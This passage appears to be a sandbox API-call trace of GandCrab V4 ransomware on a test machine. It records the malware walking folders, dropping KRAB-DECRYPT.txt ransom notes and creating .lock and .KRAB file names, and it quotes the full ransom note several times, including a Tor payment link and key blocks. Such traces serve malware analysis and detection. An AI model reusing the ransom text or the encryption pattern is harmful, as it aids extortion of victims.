flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0060.221] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0060.222] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0060.222] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0060.222] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0060.222] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.222] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.222] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\\\KRAB-DECRYPT.txt") returned 76 [0060.222] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\ms project\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0060.229] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0060.229] WriteFile (in: hFile=0x3ac, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0060.230] CloseHandle (hObject=0x3ac) returned 1 [0060.230] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.230] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.231] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x7, wMilliseconds=0x1ae)) [0060.231] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.231] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0060.231] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0060.231] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\d2ca4a08d2ca4dee3d.lock") returned 82 [0060.231] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\ms project\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3ac [0060.232] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.232] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.232] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\") returned 59 [0060.232] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\*" [0060.232] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd8e0 [0060.232] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.232] FindNextFileW (in: hFindFile=0xfbd8e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0060.232] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.232] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.232] FindNextFileW (in: hFindFile=0xfbd8e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0060.232] lstrcmpW (lpString1="16", lpString2=".") returned 1 [0060.232] lstrcmpW (lpString1="16", lpString2="..") returned 1 [0060.232] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\", lpString2="16" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16" [0060.232] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\" [0060.232] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0060.233] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0060.233] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0060.233] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0060.233] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0060.234] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.234] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.234] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\\\KRAB-DECRYPT.txt") returned 79 [0060.234] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\ms project\\16\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0060.235] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0060.235] WriteFile (in: hFile=0x440, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0060.235] CloseHandle (hObject=0x440) returned 1 [0060.236] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.236] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.236] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x7, wMilliseconds=0x1ae)) [0060.236] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.236] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0060.236] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0060.237] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\d2ca4a08d2ca4dee3d.lock") returned 85 [0060.237] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\ms project\\16\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x440 [0060.237] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.237] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.238] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\") returned 62 [0060.238] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\*" [0060.238] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0xfbd1e0 [0060.238] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.238] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0060.238] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.238] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.238] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0060.238] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0060.238] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0060.238] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\d2ca4a08d2ca4dee3d.lock" [0060.238] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.238] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 90 [0060.238] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\d2ca4a08d2ca4dee3d.lock") returned 85 [0060.238] lstrlenW (lpString=".lock") returned 5 [0060.238] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.239] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0060.239] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.239] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.239] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0060.239] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0060.239] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0060.241] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\", lpString2="en-US" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US" [0060.241] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\" [0060.241] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0060.241] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0060.241] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0060.241] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0060.241] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0060.241] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.242] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.242] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\\\KRAB-DECRYPT.txt") returned 85 [0060.242] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\ms project\\16\\en-us\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, 